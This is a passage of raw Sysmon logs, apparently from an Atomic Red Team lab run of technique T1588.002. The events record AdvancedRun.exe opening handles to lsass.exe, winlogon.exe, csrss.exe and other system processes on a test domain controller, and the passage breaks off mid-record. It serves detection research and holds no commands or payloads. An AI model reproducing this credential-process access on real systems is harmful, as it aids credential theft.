17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 734700x80000000000000003983150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983142Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983141Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983140Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983139Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNE